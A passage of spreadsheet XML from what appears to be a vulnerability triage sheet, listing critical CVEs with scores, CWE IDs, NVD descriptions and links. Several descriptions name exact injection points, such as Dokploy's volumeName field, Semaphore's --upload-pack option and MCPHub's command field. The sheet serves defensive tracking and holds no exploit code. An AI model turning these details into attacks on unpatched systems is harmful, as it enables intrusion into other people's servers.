      <c r="D89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E89" s="5" t="inlineStr"/>
      <c r="F89" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G89" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L89" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy allows an authenticated low-privilege member to execute arbitrary commands on the control-plane host because the volumeName field accepted by volumeBackup.create and volumeBackup.runManually is interpolated without quoting in packages/server/src/utils/volume-backups/backup.ts and executed through child_process.exec, with Docker socket access making execution host/root-equivalent. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72901</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72902</t>
        </is>
      </c>
      <c r="C90" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E90" s="5" t="inlineStr"/>
      <c r="F90" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G90" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L90" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy allows an authenticated user to execute arbitrary commands on a local or SSH-connected target server because registry.testRegistry and registry.testRegistryById in apps/dokploy/server/api/routers/registry.ts interpolate the password field into an execAsyncRemote shell command instead of using safeDockerLoginCommand. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72902</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72911</t>
        </is>
      </c>
      <c r="C91" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D91" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E91" s="5" t="inlineStr"/>
      <c r="F91" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L91" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.118.0 and 16.29.0, the validate_template and render_template calls in erpnext/accounts/doctype/process_statement_of_accounts/process_statement_of_accounts.py render subject, body, and pdf_name fields with unrestricted globals including frappe.utils, allowing an authenticated user with a common operational role to inject template expressions, execute arbitrary server-side code, and read data across the application. This issue is fixed in versions 15.118.0 and 16.29.0.</t>
        </is>
      </c>
      <c r="M91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72911</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73263</t>
        </is>
      </c>
      <c r="C92" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E92" s="5" t="inlineStr"/>
      <c r="F92" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G92" s="5" t="inlineStr">
        <is>
          <t>kubernetes, python</t>
        </is>
      </c>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L92" s="5" t="inlineStr">
        <is>
          <t>Prowler is a cloud security platform. Prior to 5.36.0, the Kubernetes provider connection test accepted kubeconfig_content containing a legacy gcp auth-provider with config.cmd-path and config.cmd-args because kubeconfig_contains_exec_auth in api/src/backend/api/v1/serializers.py checked only exec blocks, and POST /api/v1/providers/{id}/connection loaded it through config.load_kube_config_from_dict in prowler/providers/kubernetes/kubernetes_provider.py, causing kubernetes-python CommandTokenSource.token to run the attacker-supplied command through subprocess.Popen on the shared worker. This issue is fixed in version 5.36.0.</t>
        </is>
      </c>
      <c r="M92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73263</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73268</t>
        </is>
      </c>
      <c r="C93" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E93" s="5" t="inlineStr"/>
      <c r="F93" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L93" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the cluster-curator-controller component of multicluster engine (MCE). A tenant with create or update permissions on ClusterCurator resources can inject an arbitrary Job specification. This is possible because the CreateJob() function does not validate user-controlled input when unmarshaling the spec.install.overrideJob raw extension. Successful exploitation allows the injected Job to run with the controller's elevated privileges, leading to arbitrary code execution and privilege escalation, potentially accessing cluster-wide secrets.</t>
        </is>
      </c>
      <c r="M93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73268</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73269</t>
        </is>
      </c>
      <c r="C94" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E94" s="5" t="inlineStr"/>
      <c r="F94" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L94" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the cluster-curator-controller component. A local user, by creating a ClusterCurator resource with a specific naming convention, can trigger the creation of a cluster-scoped ClusterRoleBinding. This allows the user to escalate their privileges from namespace-local access to cluster-wide control. This privilege escalation grants broad permissions, including the ability to access and manipulate secrets, manage cluster actions, and delete hosted clusters or node pools.</t>
        </is>
      </c>
      <c r="M94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73269</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73294</t>
        </is>
      </c>
      <c r="C95" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E95" s="5" t="inlineStr"/>
      <c r="F95" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="L95" s="5" t="inlineStr">
        <is>
          <t>Semaphore UI is a web interface for managing DevOps tools. Prior to 2.18.17 and 2.19.5-beta2, repository git_url handling passes an attacker-controlled --upload-pack option to CmdGitClient.GetLastRemoteCommitHash through POST /api/project/{id}/repositories and scheduled commit-hash polling, allowing a project Manager or Owner to execute arbitrary OS commands in the Semaphore server process. This issue is fixed in versions 2.18.17 and 2.19.5-beta2.</t>
        </is>
      </c>
      <c r="M95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7374</t>
        </is>
      </c>
      <c r="C96" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D96" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E96" s="5" t="inlineStr"/>
      <c r="F96" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr">
        <is>
          <t>2026-05-26</t>
        </is>
      </c>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L96" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in KubeVirt's virt-handler component. This vulnerability allows an authenticated OpenShift user with edit permissions in a single namespace to exploit improper symlink validation when connecting to virtual machine console sockets. By replacing the console socket with a symlink to the host's container runtime (CRI-O) socket, an attacker can hijack virt-handler's privileged connection. This enables the attacker to access any Unix socket on the host, potentially leading to full control of the node and the entire cluster.</t>
        </is>
      </c>
      <c r="M96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7374</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78234</t>
        </is>
      </c>
      <c r="C97" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D97" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E97" s="5" t="inlineStr"/>
      <c r="F97" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L97" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. The operator reads the OpenShift Service CA private signing key from the openshift-service-ca namespace and uses it to mint client certificates with a Subject Common Name (CN) supplied by the author of a namespaced Hawtio custom resource. Because the operator ships a ClusterRole that aggregates Hawtio CR permissions into the edit and admin roles, any user with edit access in any namespace can obtain a Service-CA-signed certificate with an arbitrary subject. This certificate can be used to impersonate any in-cluster service identity to peers that trust the Service CA for client authentication, including Jolokia agents and other Service-CA-trusting components.</t>
        </is>
      </c>
      <c r="M97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78234</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79748</t>
        </is>
      </c>
      <c r="C98" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D98" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E98" s="5" t="inlineStr"/>
      <c r="F98" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G98" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L98" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 0.12.15, the POST /api/servers and PUT /api/servers/:name endpoints in MCPHub create/update MCP server configurations and then immediately spawn the configured stdio process via child_process.spawn. Authentication is required, but there is no authorization check restricting these endpoints to admins, and there is no allowlist/sanitization on the command and args fields. As a result, any authenticated non-admin user can submit a server configuration with command:"/bin/sh" (or any other binary) and arbitrary args, causing MCPHub to execute the attacker-controlled process as the MCPHub server's OS user (commonly root in the published Docker image and in npx/systemd deployments). This issue has been patched in version 0.12.15.</t>
        </is>
      </c>
      <c r="M98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79748</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83941</t>
        </is>
      </c>
      <c r="C99" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D99" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E99" s="5" t="inlineStr"/>
      <c r="F99" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L99" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84869</t>
        </is>
      </c>
      <c r="C100" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D100" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E100" s="5" t="inlineStr"/>
      <c r="F100" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862</t>
        </is>
      </c>
      <c r="L100" s="5" t="inlineStr">
        <is>
          <t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t>
        </is>
      </c>
      <c r="M100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86464</t>
        </is>
      </c>
      <c r="C101" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D101" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E101" s="5" t="inlineStr"/>
      <c r="F101" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G101" s="5" t="inlineStr">
        <is>
          <t>kubernetes, docker, postgresql</t>
        </is>
      </c>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="L101" s="5" t="inlineStr">
        <is>
          <t>In the current development version of Eclipse aeriOS, for which no official release has yet been published, the Identity Manager (IdM) deployment included insecure default configurations and credentials for security-sensitive services.
The Helm chart exposed the Keycloak service and its PostgreSQL backing database through Kubernetes NodePort services by default, while the Docker Compose deployment similarly exposed PostgreSQL on all network interfaces. The deployment included fixed default credentials for the Keycloak administrator and PostgreSQL database user, and the previous Helm chart configuration did not provide adequate secret management for these credentials. In addition, predefined application users with known credentials were provided for development and testing without sufficiently warning operators against their use in production environments.
An attacker able to reach the exposed services could use the published default credentials to obtain administrative access to the Identity Manager or direct access to its database. This could allow unauthorized access to or modification of identity-management data, including users, roles, client credentials, sessions, and cryptographic material, and could enable the creation of privileged identities or tokens accepted by other aeriOS components.
The issue has been addressed by generating a random Keycloak administrator password by default, managing Keycloak and PostgreSQL credentials through Kubernetes Secrets, and restricting PostgreSQL to an internal service in both the Helm chart and Docker Compose deployment. OpenLDAP is also restricted to an internal service. The predefined users intended for development and testing are retained, but the documentation now explicitly warns that their default credentials must not be used in production and that these users should be removed or their credentials changed after installation.</t>
        </is>
      </c>
      <c r="M101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89094</t>
        </is>
      </c>
      <c r="C102" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D102" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E102" s="5" t="inlineStr"/>
      <c r="F102" s="5" t="inlineStr"/>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L102" s="5" t="inlineStr">
        <is>
          <t>Forgejo before 16.0.4 allows remote code execution via a crafted template repository because template expansion on files in .forgejo/template is mishandled.</t>
        </is>
      </c>
      <c r="M102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89094</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-43716</t>
        </is>
      </c>
      <c r="C103" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D103" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E103" s="5" t="inlineStr"/>
      <c r="F103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L103" s="5" t="inlineStr">
        <is>
          <t>Verification Bypass vulnerability exists in EPSON 150075647YWWV110 EasyMP Network Updater Ver.1.20. The Epson projector can be updated by encrypted firmware through USB.</t>
        </is>
      </c>
      <c r="M103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-43716</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-43717</t>
        </is>
      </c>
      <c r="C104" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D104" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E104" s="5" t="inlineStr"/>
      <c r="F104" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L104" s="5" t="inlineStr">
        <is>
          <t>An issue exists in pson EH-TW5350 Epson iProjection.apk v3.2.6. If you identify a projector equipped with an iProjection function, you can access the projector using hard-coded authentication information and control the projector maliciously.</t>
        </is>
      </c>
      <c r="M104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-43717</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-42179</t>
        </is>
      </c>
      <c r="C105" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D105" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E105" s="5" t="inlineStr"/>
      <c r="F105" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L105" s="5" t="inlineStr">
        <is>
          <t>Bird Home Automation GmbH D1101V-F 000140 is vulnerable to Incorrect Access Control via the Key derivation process, password validation process.</t>
        </is>
      </c>
      <c r="M105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-42179</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-11080</t>
        </is>
      </c>
      <c r="C106" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D106" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E106" s="5" t="inlineStr"/>
      <c r="F106" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L106" s="5" t="inlineStr">
        <is>
          <t>The Post Grid and Gutenberg Blocks – ComboBlocks plugin for WordPress is vulnerable to Unauthenticated Hook Injection in versions 2.2.32 to 2.3.1 via several functions in the ~/includes/blocks/form-wrap/function.php file. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress, granted no other security controls are present in the function.</t>
        </is>
      </c>
      <c r="M106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-11080</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-22373</t>
        </is>
      </c>
      <c r="C107" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D107" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E107" s="5" t="inlineStr"/>
      <c r="F107" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr">
        <is>
          <t>fedoraproject:fedora, malaterre:grassroots_dicom</t>
        </is>
      </c>
      <c r="I107" s="5" t="inlineStr">
        <is>
          <t>2024-04-25</t>
        </is>
      </c>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="L107" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write vulnerability exists in the JPEG2000Codec::DecodeByStreamsCommon functionality of Mathieu Malaterre Grassroot DICOM 3.0.23. A specially crafted DICOM file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.</t>
        </is>
      </c>
      <c r="M107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-22373</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-29296</t>
        </is>
      </c>
      <c r="C108" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D108" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E108" s="5" t="inlineStr"/>
      <c r="F108" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L108" s="5" t="inlineStr">
        <is>
          <t>H3C Magic BE18000 V200R007, H3C NX400 V100R015, H3C Magic NX30 Pro V100R0011, H3C Magic R3010 V100R009, H3C Magic NX15 V100R017, H3C Magic R1510 V100R016, H3C NE36 Pro V100R002 and H3C MC102G HM1A0V200R010 contain multiple command injection vulnerabilities in the /api/esps request handler. The affected object interfaces and methods are esps.dhcpd.vlan (getlist, delete), esps.filter.url (add, modify), esps.apcm.version (delete, H3C Magic NX15 only), esps.swcm.version (delete, upgrade, all affected models except H3C Magic NX15), and esps.system.ntp (set, all affected models except H3C Magic NX15). Attacker-controlled request parameters are incorporated into shell expressions executed by eval without adequate validation, allowing a remote attacker to execute arbitrary commands as root and gain complete control of the affected device.</t>
        </is>
      </c>
      <c r="M108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-29296</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-63823</t>
        </is>
      </c>
      <c r="C109" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D109" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E109" s="5" t="inlineStr"/>
      <c r="F109" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L109" s="5" t="inlineStr">
        <is>
          <t>My Safetipin Android Application 5.2.1 contains Hardcoded credentials in the authentication module, which allows remote attackers to bypass authentication and gain unauthorized access to user accounts via predictable OTP values.</t>
        </is>
      </c>
      <c r="M109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-63823</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
